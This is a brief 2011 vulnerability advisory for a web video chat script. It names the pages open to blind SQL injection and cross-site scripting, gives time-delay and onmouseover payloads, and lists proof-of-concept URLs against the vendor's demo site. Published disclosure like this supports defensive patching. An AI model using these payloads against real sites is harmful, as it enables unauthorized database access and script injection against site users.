Video Girls BiZ Video Chat Script Cross Site Scripting / SQL Injection

`# Exploit Title: Video Girls BiZ Video Chat Script - Blind SQL Injection and XSS Vulnerability  
# Date: 2011  
# Author: Eyup CELIK  
# Version: All Version  
# Tested on: All versions are Vulnerability  
# Web Site: www.eyupcelik.com.tr  
  
  
ISSUE  
  
Blind SQL Injection and XSS can be done using.  
  
Vulnerable Page:  
forum.php (Blind SQL Injection)  
register.php (XSS)  
submit.php (XSS)  
videoflashchat.php (XSS)  
forgot.php (XSS)  
picrute.php (XSS)  
  
Example:  
2 and sleep(2) (For Blind Sql Injection)  
'onmouseover=prompt(957589)> (For XSS)  
  
  
POC:  
http://www.videogirls.biz/demo/videoflashchat.php/%22onmouseover=prompt%28940499%29%3E  
http://www.videogirls.biz/demo/forum.php?ftid=2%20and%20sleep%282%29%20&t=Test-Forum-Category-2-test-topic-announcement  
  
  
Thanks,  
  
Eyup CELIK  
Information Technology Security Specialist  
http://www.eyupcelik.com.tr  
`